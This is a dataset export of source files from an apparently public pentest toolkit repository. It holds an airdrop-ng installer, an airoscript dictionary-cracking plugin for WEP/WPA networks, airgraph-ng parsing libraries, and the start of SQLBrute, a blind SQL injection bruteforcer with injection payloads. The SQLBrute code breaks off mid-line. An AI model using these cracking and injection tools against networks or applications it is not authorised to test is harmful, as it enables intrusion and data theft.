id
int64
0
458k
file_name
stringlengths
4
119
file_path
stringlengths
14
227
content
stringlengths
24
9.96M
size
int64
24
9.96M
language
stringclasses
1 value
extension
stringclasses
14 values
total_lines
int64
1
219k
avg_line_length
float64
2.52
4.63M
max_line_length
int64
5
9.91M
alphanum_fraction
float64
0
1
repo_name
stringlengths
7
101
repo_stars
int64
100
139k
repo_forks
int64
0
26.4k
repo_open_issues
int64
0
2.27k
repo_license
stringclasses
12 values
repo_extraction_date
stringclasses
433 values
18,900
install.py
pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airdrop-ng/old-installers/install.py
#!/usr/bin/env python __version__ = "1.13.2010.21:00" __author__ = "Marfi" ''' This is the installer file for airdrop-ng. It first checks for different dependancies, such as make, svn, etc. ''' import os, sys from shutil import rmtree if os.geteuid() != 0: print "Installer must be root to run. \nPlease 'su' or 'sudo -i' and try again. \nExiting..." sys.exit(1) class checkDepend: def __init__ (self): clear = "\n" *100 print clear print "Checking for dependancies used by the installer..." self.a = 0 self.deps = ["make", "svn", "tar", "gcc"] for depends in self.deps: if (os.path.isfile("/usr/bin/" + depends) or os.path.isfile("/usr/sbin/" + depends) or os.path.isfile("/usr/local/bin/" + depends) or os.path.isfile("/usr/local/sbin/" + depends) or os.path.isfile ("/bin/" + depends) ) == True: pass else: self.a = 1 print depends + " not installed." if self.a == 0: print "All dependancies installed! Continuing...\n" print "#### NOTE: For Ubuntu based distro's, \npython2.6-dev must be installed. Please \nmake sure it is installed before continuing!\n" else: print "Please install dependancies. Exiting...\n\n" exit() class installAirdrop: def __init__(self): print "Welcome to the airdrop-ng installer!\nYou will be prompted for installing\nAirdrop-ng, lorcon, and pylorcon.\n" yno = raw_input ("Continue with installer? (y/n): ") if yno == "y": pass else: print "Fine, be that way. Exiting..." exit() yno = raw_input ("Install airdrop-ng? (y/n): ") if yno == "y": self.install() else: print "airdrop-ng not installed. Continuing..." pass def install(self): print "Build exist? " if os.path.isdir("build"): rmtree("build") # imported from shutil, or shutil.rmtree() print "File exists. Cleaning it..." os.mkdir ("build") else: os.mkdir ("build") print "Didn't exist. Creating..." # moves everything to build/. This is to keep everything clean, # and not clutter up the directory. os.system ("cp airdrop-ng build/ && cp -r lib build/ && cp docs/airdrop-ng.1 build/") print "Files copied. Now, moving to directory..." os.chdir ("build") if os.path.isdir("/usr/lib/airdrop-ng") == True: rmtree ("/usr/lib/airdrop-ng") print "Moving airdrop-ng to /usr/bin, lib to \n/usr/lib/airdrop-ng, and installing man pages..." os.system ("cp airdrop-ng /usr/bin/airdrop-ng && cp -r lib /usr/lib/airdrop-ng && cp airdrop-ng.1 /usr/share/man/man1/") #os.chdir ("..") print "airdrop-ng installed! =)" class installLorcon: def __init__(self): yno = raw_input ("Would you like to install lorcon? (y/n): ") if yno == "y": print "Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may take a while..." os.system ("svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old") os.chdir("lorcon-old") os.system ("./configure && make && make install") print "Creating symlinks..." os.system ("ln -s /usr/local/lib/liborcon-1.0.0.so /usr/lib") os.chdir("..") else: print "Lorcon wasn't installed. " class installPylorcon: def __init__(self): yno = raw_input ("Would you like to install pylorcon? (y/n): ") if yno == "y": import urllib urllib.urlretrieve("http://pylorcon.googlecode.com/files/pylorcon-3.tar.bz2", "pylorcon-3.tar.bz2") os.system ("tar -xvf pylorcon-3.tar.bz2") os.chdir ("pylorcon") os.system ("python setup.py install") os.chdir("..") # What actually runs the classes checkDepend() installAirdrop() installLorcon() installPylorcon() yno = raw_input ("Clean up? (y/n): ") if yno == "y": os.chdir("..") if os.path.isdir("build") == True: rmtree("build") print "Operation(s) complete! May the source be with you. =) " sys.exit()
3,760
Python
.py
101
34.138614
230
0.669508
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,901
digenpy
pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airoscript-ng/src/plugins/digenpy
# Dict generators for airoscript #DEPENDS: digenpy # Copyright (C) 2009-2011 David Francos Cuartero # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. p_menu+=("Crack with dictionary generator"); digenpy_(){ [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { enc="WPA"; } || { enc="WEP"; } [[ "$3" == "crack" ]] && { execute "Cracking" crack $AIRCRACK -0 -l $DUMP_PATH/$Host_MAC.key -w $DUMP_PATH/digenpy__dic $DUMP_PATH/$Host_MAC-01.cap } || { [[ $3 == "conn_crack" ]] && { conn_crack && cp $DUMP_PATH/digenpy__dic $DUMP_PATH/$Host_MAC.key || return 1 } || { AUTO=1; QUIET=0; digenpy $1 $2 $Host_MAC $Host_SSID $enc > $DUMP_PATH/digenpy__dic; markwarn "Dictionary automatically generated present in $DUMP_PATH/digenpy__dic" AUTO=0; QUIET=""; } } } Telefonica(){ if [[ "$Host_SSID" =~ WLAN* ]]; then avail=1; [[ $test == 1 ]] && return digenpy_ Spanish Telefonica digenpy_ Spanish Telefonica crack && cracked=1 fi } Jazztel(){ if [[ "$Host_SSID" =~ JAZZTEL* ]]; then avail=1; [[ $test == 1 ]] && return [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { min_ivs=10; return; } warn $"Encription is" "$Host_ENC" digenpy_ Spanish Jazztel digenpy_ Spanish Jazztel crack && cracked=1 fi; } TelefonicaWPA(){ if [[ "$Host_SSID" =~ WLAN* ]]; then avail=1; [[ $test == 1 ]] && return digenpy_ Spanish TelefonicaWPA digenpy_ Spanish TelefonicaWPA conn_crack && cracked=1 fi } JazztelWPA(){ if [[ "$Host_SSID" =~ JAZZTEL* ]]; then avail=1; [[ $test == 1 ]] && return [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { min_ivs=10; return; } warn $"Encription is" "$Host_ENC" digenpy_ Spanish JazztelWPA digenpy_ Spanish JazztelWPA conn_crack && cracked=1 fi; } Crack_with_dictionary_generator(){ if [ "$Host_SSID" == "" ]; then $clear; echo -e $"Error: You must select a target first"; return; fi [[ "${1}" == "get_wpa" ]] && { for function in "TelefonicaWPA" "JazztelWPA" ; do $function; test=0; done return } if [ "$1" == "return_ivs" ]; then for function in "Telefonica" "Jazztel" ; do test=1; $function; test=0; [[ "$avail" == "1" ]] && return 4; done return 255 else for function in "Telefonica" "Jazztel"; do tag [[ $QUIET_DIGENPY == 1 ]] || warn "${mark}Trying $function" $function [[ "$cracked" == "1" ]] && return done if [ "$1" == "autocrack" ]; then export wait_for_execute=1; AUTO=1; selectcracking 1; AUTO=0; export wait_for_execute=0; else selectcracking fi fi }
3,563
Python
.py
91
32.626374
128
0.569569
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,902
setup.py
pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/setup.py
#!/usr/bin/env python # This file is Copyright David Francos Cuartero, licensed under the GPL2 license. from distutils.core import setup import os setup(name='airgraph-ng', version='1.1', description='Aircrack-ng network grapher', author='TheX1le', console = [{"script": "airgraph-ng" }], url='http://aircrack-ng.org', license='GPL2', classifiers=[ 'Development Status :: 4 - Beta', ], packages=['graphviz'], scripts=['dump-join', 'airgraph-ng'], )
526
Python
.py
17
25.411765
81
0.633136
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,903
lib_Airgraphviz.py
pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/graphviz/lib_Airgraphviz.py
__author__ = 'Ben "TheX1le" Smith' __email__ = 'thex1le@gmail.com' __website__= 'http://trac.aircrack-ng.org/browser/trunk/scripts/airgraph-ng/' __date__ = '03/02/09' __version__ = '' __file__ = 'lib_Airgraphviz.py' __data__ = 'This library supports airgraph-ng' """ ######################################## # # Airgraph-ng.py --- Generate Graphs from airodump CSV Files # # Copyright (C) 2009 Ben Smith <thex1le[a.t]gmail.com> # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation; version 2. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # ######################################### """ """ Airgraph-ng Support Library """ def apColor(Label,APcolorList): #OLDNAME AP_Label_Color """ Inputs a list containing AP information and the AP color information Returns a graph object that holds AP information (colors and details) TODO: Get sample data for each line? """ APcolor = APcolorList[0] fontColor = APcolorList[1] graph = ['\t','"',Label[0],'"', '[label="',Label[0], '\\nEssid: ',Label[1].rstrip('\x00'), #NULL ESSID is equal to binary space, must remove '\\nChannel: ',Label[2], '\\nEncryption: ',Label[3], '\\nNumber of Clients: ','%s' %(Label[4]), #Check to see if this method is actually needed '"',' style=filled', ' fillcolor="',APcolor, '"',' fontcolor="',fontColor, '"',' fontsize=7','];\n'] return graph def clientColor(mac,color,label=""): #OLDNAME Client_Label_Color """ Creates a label for the client information passed in (mac, color) Returns a graph object TODO: Pass a label in that may hold additional client data that could in turn be written on the client. """ if label == "": label = mac graph = ['\t','"',mac,'"',' [label="',label,'"',' color="',color,'"',' fontsize=7','];\n'] return graph def encryptionColor(enc): #OLDNAME Return_Enc_type """ Take in the encryption used by the AP and return the proper color scheme based on that value. Returns a list containing the AP fill color and AP font color """ fontColor = "black" #Default Font Color to be used if enc == "OPN": color = "firebrick2" elif enc == "WEP": color = "gold2" elif enc in ["WPA","WPA2WPA","WPA2","WPAOPN"]: color = "green3" else: #No AP should ever get to this point as they will either be encrypted or open color = "black" fontColor = "white" APcolorList = (color,fontColor) #OLDNAME colorLS return APcolorList def graphvizLinker(objA,sep,objB): #OLDNAME graphviz_link """ Return a graph object that links 2 objects together. Both objects are passed in with a separator """ graph =['\t','"',objA,'"',sep,'"',objB,'"',';\n'] return graph def dotClose(input,footer): #OLDNAME dot_close """ Close the graphiz config file Return final output to be written """ input.extend(footer) input.append("}") output = ''.join(input) return output def dotWrite(data): #OLDNAME dot_write """ Write all the information obtained to a configuration file """ try: subprocess.Popen(["rm","-rf","airGconfig.dot"]) #Delete the file if it already exists except Exception: pass file = open('airGconfig.dot','a') file.writelines(data) file.close() def subGraph(items,graphName,graphType,tracked,parse): #OLDNAME subgraph """ Create a subgraph based on the incoming values TODO: Figure out what this does and clean it up """ subgraph = ['\tsubgraph cluster_',graphType,'{\n\tlabel="',graphName,'" ;\n'] if parse == "y": for line in items: clientMAC = line[0] probe_req = ', '.join(line[6:]) for bssid in tracked: if clientMAC not in tracked[bssid]:#check to make sure were not creating a node for a client that has an association allready subgraph.extend(['\tnode [label="',clientMAC,' \\nProbe Requests: ',probe_req,'" ] "',clientMAC,'";\n']) subgraph.extend(['\t}\n']) elif parse == "n": subgraph.extend(items) subgraph.extend(['\t}\n']) return subgraph ############################################### # Filter Class # ############################################### #def filter_enc(input,enc): # AP = info[1] # for key in AP: # bssid = AP[key] # if bssid[5] != enc: # del AP[bssid] # return_list = [info[0],AP] # return return_list #encryption type #number of clients #OUI #channel #beacon rate? #essid #speed #time #probe requests #whore mode... search for ANY one wanting to connect
4,782
Python
.py
137
31.978102
129
0.654919
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,904
libDumpParse.py
pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/graphviz/libDumpParse.py
#!/usr/bin/python #airodump parsing lib #returns in an array of client and Ap information #part of the airdrop-ng project from sys import exit as Exit class airDumpParse: def parser(self,file): """ One Function to call to parse a file and return the information """ self.capr = None self.NAP = None self.NA = None self.apDict = None self.clientDict = None fileOpenResults = self.airDumpOpen(file) self.airDumpParse(fileOpenResults) self.clientApChannelRelationship() return {'NA':self.NA,'capr':self.capr,'apDict':self.apDict, 'clientDict':self.clientDict,'NAP':self.NAP} def airDumpOpen(self,file): """ Takes one argument (the input file) and opens it for reading Returns a list full of data """ try: openedFile = open(file, "r") except IOError: print "Error Airodump File",file,"does not exist" Exit(1) data = openedFile.xreadlines() cleanedData = [] for line in data: cleanedData.append(line.rstrip()) openedFile.close() return cleanedData def airDumpParse(self,cleanedDump): """ Function takes parsed dump file list and does some more cleaning. Returns a list of 2 dictionaries (Clients and APs) """ try: #some very basic error handeling to make sure they are loading up the correct file try: apStart = cleanedDump.index('BSSID, First time seen, Last time seen, Channel, Speed, Privacy, Power, # beacons, # data, LAN IP, ESSID') except Exception: apStart = cleanedDump.index('BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key') del cleanedDump[apStart] #remove the first line of text with the headings try: stationStart = cleanedDump.index('Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs') except Exception: stationStart = cleanedDump.index('Station MAC, First time seen, Last time seen, Power, # packets, BSSID, ESSID') except Exception: print "You Seem to have provided an improper input file please make sure you are loading an airodump txt file and not a pcap" Exit(1) del cleanedDump[stationStart] #Remove the heading line clientList = cleanedDump[stationStart:] #Splits all client data into its own list del cleanedDump[stationStart:] #The remaining list is all of the AP information self.apDict = self.apTag(cleanedDump) self.clientDict = self.clientTag(clientList) return def apTag(self,devices): """ Create a ap dictionary with tags of the data type on an incoming list """ dict = {} for entry in devices: ap = {} string_list = entry.split(',') #sorry for the clusterfuck but i swear it all makse sense this is builiding a dic from our list so we dont have to do postion calls later len(string_list) if len(string_list) == 15: ap = {"bssid":string_list[0].replace(' ',''), "fts":string_list[1], "lts":string_list[2], "channel":string_list[3].replace(' ',''), "speed":string_list[4], "privacy":string_list[5].replace(' ',''), "cipher":string_list[6], "auth":string_list[7], "power":string_list[8], "beacons":string_list[9], "iv":string_list[10], "ip":string_list[11], "id":string_list[12], "essid":string_list[13][1:], "key":string_list[14]} elif len(string_list) == 11: ap = {"bssid":string_list[0].replace(' ',''), "fts":string_list[1], "lts":string_list[2], "channel":string_list[3].replace(' ',''), "speed":string_list[4], "privacy":string_list[5].replace(' ',''), "power":string_list[6], "beacons":string_list[7], "data":string_list[8], "ip":string_list[9], "essid":string_list[10][1:]} if len(ap) != 0: dict[string_list[0]] = ap return dict def clientTag(self,devices): """ Create a client dictionary with tags of the data type on an incoming list """ dict = {} for entry in devices: client = {} string_list = entry.split(',') if len(string_list) >= 7: client = {"station":string_list[0].replace(' ',''), "fts":string_list[1], "lts":string_list[2], "power":string_list[3], "packets":string_list[4], "bssid":string_list[5].replace(' ',''), "probe":string_list[6:][0:]} if len(client) != 0: dict[string_list[0]] = client return dict def clientApChannelRelationship(self): """ parse the dic for the relationships of client to ap in the process also populate list of """ clients = self.clientDict AP = self.apDict NA = [] #create a var to keep the not associdated clients mac's NAP = [] #create a var to keep track of associated clients mac's to AP's we cant see apCount = {} #count number of Aps dict is faster the list stored as BSSID:number of essids apClient = {} #dict that stores bssid and clients as a nested list for key in (clients): mac = clients[key] #mac is the MAC address of the client if mac["bssid"] != ' (notassociated) ': #one line of of our dictionary of clients if AP.has_key(mac["bssid"]): # if it is check to see its an AP we can see and have info on if apClient.has_key(mac["bssid"]): apClient[mac["bssid"]].extend([key]) #if key exists append new client else: apClient[mac["bssid"]] = [key] #create new key and append the client else: NAP.append(key) # stores the clients that are talking to an access point we cant see else: NA.append(key) #stores the lines of the not assocated AP's in a list self.NAP = NAP self.NA = NA self.capr = apClient return
6,884
Python
.py
145
34.489655
189
0.552722
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,905
libOuiParse.py
pwnieexpress_raspberry_pwn/src/aircrack-ng-1.2-rc1/scripts/airgraph-ng/graphviz/libOuiParse.py
#!/usr/bin/env python __author__ = 'Ben "TheX1le" Smith, Marfi' __email__ = 'thex1le@gmail.com' __website__= '' __date__ = '04/26/2011' __version__ = '2011.4.26' __file__ = 'ouiParse.py' __data__ = 'a class for dealing with the oui txt file' """ ######################################## # # This program and its support programs are free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation; version 2. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # ######################################### """ import re, urllib, sys, os import pdb #this lib is crap and needs to be rewritten -Textile if os.path.isdir('./support/'): path='./support/' elif os.path.isdir('/usr/local/share/airgraph-ng/'): path='/usr/local/share/airgraph-ng/' elif os.path.isdir('/usr/share/airgraph-ng/'): path='/usr/share/airgraph-ng/' else: raise Exception("Could not determine path, please, check your installation") class macOUI_lookup: """ A class for deaing with OUIs and deterimining device type """ def __init__(self, oui=False): """ generate the two dictionaries and return them """ #a poor fix where if we have no file it trys to download it self.ouiTxtUrl = "http://standards.ieee.org/regauth/oui/oui.txt" self.ouiTxt = oui if not oui or not os.path.isfile(self.ouiTxt): self.ouiUpdate() self.ouiTxt = path + "oui.txt" self.last_error = None self.identDeviceDict(path + 'ouiDevice.txt') self.identDeviceDictWhacMac(path + 'whatcDB.csv') self.ouiRaw = self.ouiOpen(self.ouiTxt) self.oui_company = self.ouiParse() #dict where oui's are the keys to company names self.company_oui = self.companyParse() #dict where company name is the key to oui's def compKeyChk(self,name): """ check for valid company name key """ compMatch = re.compile(name,re.I) if self.company_oui.has_key(name): return True for key in self.company_oui.keys(): if compMatch.search(key) is not None: return True return False def ouiKeyChk(self,name): """ check for a valid oui prefix """ if self.oui_company.has_key(name): return True else: return False def lookup_OUI(self,mac): """ Lookup a oui and return the company name """ if self.ouiKeyChk(mac) is not False: return self.oui_company[mac] else: return False def lookup_company(self,companyLst): """ look up a company name and return their OUI's """ oui = [] if type(companyLst).__name__ == "list": for name in companyLst: compMatch = re.compile(name,re.I) if self.company_oui.has_key(name): oui.extend(self.company_oui[name]) else: for key in self.company_oui: if compMatch.search(key) is not None: oui.extend(self.company_oui[key]) elif type(companyLst).__name__ == "str": if self.company_oui.has_key(companyLst): oui = self.company_oui[companyLst] else: compMatch = re.compile(companyLst,re.I) for key in self.company_oui: if compMatch.search(key) is not None: oui.extend(self.company_oui[key]) #return the oui for that key return oui def ouiOpen(self,fname,flag='R'): """ open the file and read it in flag denotes use of read or readlines """ try: ouiFile = open(fname, "r") if flag == 'RL': text = ouiFile.readlines() elif flag == 'R': text = ouiFile.read() return text except IOError: return False def ouiParse(self): """ generate a oui to company lookup dict """ HexOui= {} Hex = re.compile('.*(hex).*') #matches the following example "00-00-00 (hex)\t\tXEROX CORPORATION" ouiLines = self.ouiRaw.split("\n\n") #split each company into a list one company per position for line in ouiLines: if Hex.search(line) != None: lineList = Hex.search(line).group().replace("\t"," ").split(" ") #return the matched text and build a list out of it HexOui[lineList[0].replace("-",":")] = lineList[2] #build a dict in the format of mac:company name return HexOui def companyParse(self): """ generate a company to oui lookup dict """ company_oui = {} for oui in self.oui_company: if company_oui.has_key(self.oui_company[oui][0]): company_oui[self.oui_company[oui][0]].append(oui) else: company_oui[self.oui_company[oui][0]] = [oui] return company_oui def ouiUpdate(self): """ Grab the oui txt file off the ieee.org website """ try: print("Getting OUI file from %s to %s" %(self.ouiTxtUrl, path)) urllib.urlretrieve(self.ouiTxtUrl, path + "oui.txt") print "Completed Successfully" except Exception, error: print("Could not download file:\n %s\n Exiting airgraph-ng" %(error)) sys.exit(0) def identDeviceDict(self,fname): """ Create two dicts allowing device type lookup one for oui to device and one from device to OUI group """ self.ouitodevice = {} self.devicetooui = {} data = self.ouiOpen(fname,'RL') if data == False: self.last_error = "Unable to open lookup file for parsing" return False for line in data: dat = line.strip().split(',') self.ouitodevice[dat[1]] = dat[0] if dat[0] in self.devicetooui.keys(): self.devicetooui[dat[0]].append(dat[1]) else: self.devicetooui[dat[0]] = [dat[1]] def identDeviceDictWhacMac(self,fname): """ Create two dicts allowing device type lookup from whatmac DB one for oui to device and one from the device to OUI group """ self.ouitodeviceWhatmac3 = {} self.ouitodeviceWhatmac = {} self.devicetoouiWhacmac = {} data = self.ouiOpen(fname,'RL') if data == False: self.last_error = "Unble to open lookup file for parsing" return False for line in data: dat = line.strip().split(',') dat[0] = dat[0].upper() self.ouitodeviceWhatmac[dat[0]] = dat[1] self.ouitodeviceWhatmac3[dat[0][0:8]] = dat[1] # a db to support the 3byte lookup from whatmac if dat[1] in self.devicetoouiWhacmac.keys(): self.devicetoouiWhacmac[dat[1]].append(dat[0]) else: self.devicetoouiWhacmac[dat[1]] = [dat[0]]
7,562
Python
.py
194
29.061856
106
0.569803
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,906
sqlbrute.py
pwnieexpress_raspberry_pwn/src/pentest/sqlbrute/sqlbrute.py
#!/bin/sh ''':' exec python -O -u "$0" ${1+"$@"} ' ''' # SQLBrute - multi threaded blind SQL injection bruteforcer # By Justin Clarke, justin gdssecurity com # # Algorithm inspired by the original by Kerry Rollins # # This version does regex based (error/no error) bruteforcing and waitfor delay testing # # There is a page documenting how to use this tool at: # http://www.justinclarke.com/archives/2006/03/sqlbrute.html # # Also, a compiled version for Windows (using py2exe) is available if you're having # problems with SQLBrute (or ensure you are using Python 2.5). It's available at: # http://www.justinclarke.com/security/sqlbrute.zip # Version = "1.0" # todo # The (hopefully) final python version - next version is going to be a .NET rewrite, including: import threading import Queue import sys import getopt import string import urllib import cgi import time import re import urllib2 # Set some globals sslSupport = True # see if SSL support is compiled in for urllib2 try: import _ssl except ImportError: print "SSL support not installed - https will not be available" sslSupport = False # # class to manage the threading. No actual stuff is done in here - we pass function names and args # # Adapted from Python in a Nutshell (excellent book) # class Worker(threading.Thread): # inherits the Thread class requestID = 0 # each thread has a request ID so we can match responses # constructor - takes two queues as parameters (overrides threading constructor) def __init__(self, requestsQueue, resultsQueue, threadNumber, **kwds): threading.Thread.__init__(self, **kwds) self.setDaemon(1) # run in background self.workRequestQueue = requestsQueue self.resultQueue = resultsQueue self.setName(threadNumber) self.start() # start the thread # call the function here - pass in the function and parameters def performWork(self, callable, *args, **kwds): Worker.requestID += 1 self.workRequestQueue.put((Worker.requestID, callable, args, kwds)) return Worker.requestID def run(self): # override run while 1: requestID, callable, args, kwds = self.workRequestQueue.get() self.resultQueue.put((requestID, callable(*args+(int(self.getName()),), **kwds))) class sqlbrute: # User variables - change if you want num = 5 # default number of worker threads targeturl = "" cookie = "" verb = "" verbose = 1 postdata = "" table = "" cols = "" headers = [["User-Agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"]] wherecol = "" whereval = "" dbenum = False # default to enumerating tables from current database enumtype = "" # by default, tables will be enumerated from current database dbtype = "sqlserver" errorregex = "" targeturl = "" timetrack = time.time() timeout = 60 # timeout to wait for responses before exiting tool database = "" # database to use (instead of default) andor = " OR " # default to "or" mode. either "or" or "and" # specifies this is going to be select * from foo where 1=2 _and_ <exploit string> method = "error" # method of testing - error or time based outputfile = "" if sys.platform == "win32": # timing is unreliable in python.org win32 version. I'd use linux for now waitfor = 10 else: waitfor = 7 if sys.platform == "win32": waitres = 5 # time.time() is hideously unreliable in windows else: waitres = 5 tablesource = "sysobjects" # name of source to initially query namecol = "name" # column used for the database name substrfn = "SUBSTRING" # substring for SQL, substr for oracle reqcounter = 0 # number of test requests received testcounter = 0 # counter to track that requests have passed and failed appropriately testvar = 0 requestsQueue = Queue.Queue() resultsQueue = Queue.Queue() # add any additional characters you need matched to this list matches = ["e","t","a","o","i","n","s","r","h","l","d","u","c","f","m","w","y","g","p","b","v","k","x","j","q","z","0","1","2","3","4","5","6","7","8","9","-",".","[_]","+","#","@","$"] def usage(self): print """ ___ _____ __ ____ ____ __ __ ____ ____ / __)( _ )( ) ( _ \( _ \( )( )(_ _)( ___) \__ \ )(_)( )(__ ) _ < ) / )(__)( )( )__) (___/(___/\\\\(____)(____/(_)\_)(______) (__) (____) """ print "v.%s" % Version print """ Usage: %s options url [--help|-h] - this help [--verbose|-v] - verbose mode [--server|-d oracle|sqlserver] - type of database server (default MS SQL Server) [--error|-e regex] - regex to recognize error page (error testing only) [--threads|-s number] - number of threads (default 5) [--cookie|-k string] - cookies needed [--time|-n] - force time delay (waitfor) testing [--data|-p string] - POST data [--database|-f database] - database to enumerate data from (SQL Server) [--table|-t table] - table to extract data from [--column|-c column] - column to extract data from [--where|-w column=data] - restrict data returned to rows where column "column" matches "data" [--header|-x header::val] - header to add to the request (i.e. Referer::http://foobar/blah.asp) [--output|-o file] - file to send output to Note: exploit will go on the end of the query or post data. This must be correctly formatted for a SQL subquery to be appended. """ % sys.argv[0] print '''e.g. %s --data "searchtype=state&state=1'" --error "NO RESULTS" --database webapp --table customer --column custnum --where password=password http://myapp/locator.asp''' % sys.argv[0] # buyer beware if you change anything below - execution starts here def main(self, argv=None): if argv is None: argv = sys.argv try: try: opts, args = getopt.getopt(argv[1:], "hvs:k:f:np:x:d:t:c:w:e:o:", \ ["help","verbose","server=","header=","error=","threads=","cookie=","database=","time","data=","table=","column=","where=","output="]) if len(args) <> 1: # 1 arg is the URL print "Args <> 1" raise getopt.error except: raise getopt.error self.targeturl = args if sslSupport == False and re.search(r'https://', self.targeturl): print "You don't seem to have SSL support installed, so no https URLs for you" return 1 for o,a in opts: if o in ("-v", "--verbose"): self.verbose += 1 if o in ("-x", "--header"): self.headers += [a.split("::",1)] if o in ("-k", "--cookie"): self.cookie = a if o in ("-h", "--help"): self.usage() return 1 if o in ("-p", "--data"): self.postdata = a self.verb = "POST" if o in ("-n", "--time"): self.method = "time" if o in ("-s", "--threads"): self.num = int(a) if self.num < 1: print "Threads must be at least 1" return 1 if o in ("-d", "--server"): if a == "oracle": self.dbtype = a if a == "sqlserver": self.dbtype = a if o in ("-t", "--table"): self.table = a if o in ("-c","--column"): self.cols = a if o in ("-w", "--where"): temp = a.split("=",1) self.wherecol = temp[0] self.whereval = temp[1] if o in ("-e", "--error"): self.errorregex = a self.method = "error" if o in ("-f", "--database"): self.database = a if o in ("-o", "--output"): self.outputfile = a if self.cols<>"": if self.table=="": print "If requesting column data, you must specify table" return 1 if not self.errorregex: self.errorregex = r"(error|could not process)" if not self.verb: self.verb = "GET" if (self.verb == "POST" and not self.postdata): print "Specify some POST data" return 1 if self.enumtype=="": if self.table=="" and self.cols=="": if self.dbtype == "sqlserver" and not self.database: self.enumtype="database" else: self.enumtype="table" else: if self.table<>"" and self.cols=="": self.enumtype="column" else: self.enumtype="data" if self.dbtype=="oracle": self.substrfn = "SUBSTR" self.tablesource = "USER_TABLES" self.namecol = "TABLE_NAME" if self.verbose: print "Database type: %s" % self.dbtype print "Table: %s" % self.table print "Columns: ", self.cols print "Enumeration mode: %s" % self.enumtype print "Threads: %d" % self.num if self.database and self.dbtype=="oracle": print "Database specification is not valid for Oracle" return 1 if self.database != "": # add .. for between database and table self.database += ".." except: print "Incorrect options usage" self.usage() return 1 # create worker classes to assign work to later for i in range(self.num): self.worker = Worker(self.requestsQueue, self.resultsQueue, i) # keep track of what we send off to the queues self.workRequests = {} if self.verbose: print "Testing the application to ensure your options work\n" if self.method == "error": self.testvar = self.testexploiterror() else: self.testvar = self.testexploittime() if self.testvar==1: print """ To troubleshoot: 1) try using -v to see that the queries are correctly formatted 2) try using -vv to get the responses printed to the screen 3) fix your broken url/post data 4) check the error value you are using 5) you've specified the correct database type haven't you?""" return(1) print "This program will currently exit " + str(self.timeout) + " seconds after the last response comes in." for i in self.matches: if self.method == "error": self.gentesterror(i) else: self.gentesttime(i) self.showResults() def postReformat(self, postdata): return urllib.urlencode(cgi.parse_qsl(postdata)) def querystringReformat(self, qsdata): temp = qsdata.split("?") if len(temp) == 2: return temp[0] + "?" + urllib.urlencode(cgi.parse_qsl(temp[1])) else: return qsdata def doRequest(self, expressionString, exploitdata, match, type, threadName): while True: if self.verb == "GET": req = urllib2.Request(self.querystringReformat(expressionString)) else: req = urllib2.Request(self.querystringReformat(expressionString), self.postReformat(exploitdata)) if self.cookie<>"": req.add_header("Cookie",self.cookie) if self.headers<>[[]]: for i in self.headers: req.add_header(i[0],i[1]) try: starttime = time.time() # get time at start of request resp = urllib2.urlopen(req) except urllib2.HTTPError,err: # catch an HTTP 500 error or similar here return err.read(), match, type, starttime, time.time() except: import traceback traceback.print_exc(file=sys.stderr) sys.stderr.flush() print "Unexpected error on: %s %s - Retrying in 5 seconds" % (expressionString,exploitdata) time.sleep(5) else: return resp.read(), match, type, starttime, time.time() def testexploiterror(self): if self.dbtype=="sqlserver": positivestring = self.andor + "exists (select * from master..sysdatabases)--" negativestring = self.andor + "not exists (select * from master..sysdatabases)--" if self.dbtype=="oracle": positivestring = self.andor + "exists (select * from USER_TABLES)--" negativestring = self.andor + "not exists (select * from USER_TABLES)--" self.genreq(positivestring, "", False) self.genreq(negativestring, "", False) while self.reqcounter != 2: try: id, results = self.resultsQueue.get_nowait() except Queue.Empty: if (time.time() - self.timetrack) > self.timeout: # if its been > (timeout) seconds since last successful resp print "Timed out accessing application\n" return(1) else: continue self.timetrack = time.time() # update record of last successful response self.reqcounter += 1 # update number of requests received if self.verbose>1: print 'Result %d: -> %s' % (id, 